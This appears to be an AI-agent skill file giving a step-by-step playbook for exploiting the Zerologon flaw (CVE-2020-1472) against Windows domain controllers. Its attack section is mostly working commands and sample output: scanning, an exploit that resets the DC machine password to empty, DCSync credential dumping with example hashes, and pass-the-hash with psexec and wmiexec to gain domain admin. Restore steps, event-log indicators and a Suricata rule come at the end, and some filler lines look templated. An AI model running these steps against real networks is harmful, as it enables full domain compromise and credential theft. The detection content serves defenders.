Exploit the Zerologon vulnerability (CVE-2020-1472) in the Netlogon Remote Protocol to achieve domain controller compromise by resetting the machine account password to empty. Use when exploiting the zerologon vulnerability (cve-2020-1472) in the netlogon remote protocol.
Instrucciones de origen · Vista previa de solo lectura
name
exploiting-zerologon-vulnerability-cve-2020-1472
description
Exploit the Zerologon vulnerability (CVE-2020-1472) in the Netlogon Remote Protocol to achieve domain controller compromise by resetting the machine account password to empty. Use when exploiting the zerologon vulnerability (cve-2020-1472) in the netlogon remote protocol.
Zerologon (CVE-2020-1472) is a critical elevation of privilege vulnerability (CVSS 10.0) in the Microsoft Netlogon Remote Protocol (MS-NRPC). The flaw exists in the cryptographic implementation of AES-CFB8 mode, where the initialization vector (IV) is incorrectly set to all zeros. This allows an unauthenticated attacker with network access to a domain controller to establish a Netlogon session and reset the DC machine account password to empty, achieving full domain compromise. Microsoft patched this vulnerability in August 2020 (KB4571694).
"Exploit the Zerologon vulnerability (CVE-2020-1472) in the Netlogon Remote Proto"
When performing authorized security testing that involves exploiting zerologon vulnerability cve 2020 1472
When analyzing malware samples or attack artifacts in a controlled environment
When conducting red team exercises or penetration testing engagements
When building detection capabilities based on offensive technique understanding
Prerequisites
Network access to a Domain Controller (TCP port 135 and dynamic RPC ports)
No authentication required (unauthenticated exploit)
Target DC must not have the February 2021 enforcement mode enabled
Impacket toolkit installed
Written authorization for red team engagement
Legal Notice: This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.
MITRE ATT&CK Mapping
Technique ID
Name
Tactic
T1068
Exploitation for Privilege Escalation
Privilege Escalation
T1210
Exploitation of Remote Services
Lateral Movement
T1003.006
OS Credential Dumping: DCSync
Credential Access
T1078.002
Valid Accounts: Domain Accounts
Persistence
Vulnerability Technical Details
This section covers vulnerability technical details for exploiting zerologon vulnerability cve 2020 1472.
Ensure all prerequisites are met before proceeding
Follow the documented workflow steps in sequence
Record results and any anomalies encountered during this phase
Root Cause
The Netlogon authentication protocol uses AES-CFB8 encryption with a client challenge and server challenge. The vulnerability exists because:
The IV is hardcoded to 16 bytes of zeros
When the plaintext is 8 bytes of zeros, AES-CFB8 produces a ciphertext of all zeros with probability 1 in 256
An attacker can send approximately 256 authentication attempts (takes ~3 seconds) to succeed
Affected Systems
Windows Server 2008 R2 through Windows Server 2019
All domain controllers running unpatched Netlogon service
Samba versions < 4.8 (if running as AD DC)
Step 1: Identify Vulnerable Domain Controllers
# Scan for domain controllers
nmap -p 135,139,389,445 -sV --script=ms-sql-info,smb-os-discovery 10.10.10.0/24
# Check if DC is vulnerable using zerologon checker
python3 zerologon_tester.py DC01 10.10.10.1
# Using CrackMapExec
crackmapexec smb 10.10.10.1 -M zerologon
Step 2: Exploit Zerologon
# Using Impacket's CVE-2020-1472 exploit# This sets the DC machine account password to empty
python3 cve_2020_1472.py DC01$ 10.10.10.1
# Expected output:# Performing authentication attempts...# =========================================# NetrServerAuthenticate2 Result: 0 (success after ~256 attempts)# NetrServerPasswordSet2 call was successful# DC01$ machine account password set to empty string
Step 3: DCSync with Empty Password
# Use the empty hash to perform DCSync
secretsdump.py -no-pass -just-dc corp.local/DC01\$@10.10.10.1
# Output includes all domain hashes:# Administrator:500:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::# krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f3bc61e97fb14d18c42bcbf6c3a9055f:::# svc_sql:1103:aad3b435b51404eeaad3b435b51404ee:e4cba78b4c01d6e5c0e31ffff18e46ab:::# Alternatively, dump specific accounts
secretsdump.py -no-pass corp.local/DC01\$@10.10.10.1 \
-just-dc-user Administrator
Step 4: Obtain Domain Admin Access
# Pass the Hash with Administrator NTLM
psexec.py -hashes :32ed87bdb5fdc5e9cba88547376818d4 \
corp.local/Administrator@10.10.10.1
# Or use wmiexec for stealthier access
wmiexec.py -hashes :32ed87bdb5fdc5e9cba88547376818d4 \
corp.local/Administrator@10.10.10.1
WARNING: After exploiting Zerologon, the DC machine account password is empty, which will break Active Directory replication and services. You MUST restore it.
# Method 1: Use the exploit's restore functionality
python3 restorepassword.py corp.local/DC01@DC01 -target-ip 10.10.10.1 \
-hexpass <original_hex_password>
# Method 2: Force machine account password change from DC# Connect to DC as Administrator and run:
netdom resetpwd /server:DC01 /userd:CORP\Administrator /passwordd:*
# Method 3: Restart the DC (it will auto-regenerate machine password)# This is the safest method but causes downtime
Detection
This section covers detection for exploiting zerologon vulnerability cve 2020 1472.
Ensure all prerequisites are met before proceeding
Follow the documented workflow steps in sequence
Record results and any anomalies encountered during this phase
Windows Event Logs
Event ID 4742: A computer account was changed
- Look for: DC$ account with password change
- Anomaly: Multiple 4742 events for DC$ in short period
Event ID 5805: Netlogon authentication failure
- Multiple failures followed by success = Zerologon attempt
Event ID 4624 (Type 3): Network logon
- DC$ account logging in from unexpected IP
Network Detection
# Suricata rule for Zerologonalertdcerpcanyany->anyany(msg:"ETEXPLOITPossibleZerologonNetrServerReqChallenge";flow:established,to_server;dce_opnum:4;content:"|0000000000000000|";sid:2030870;rev:1;)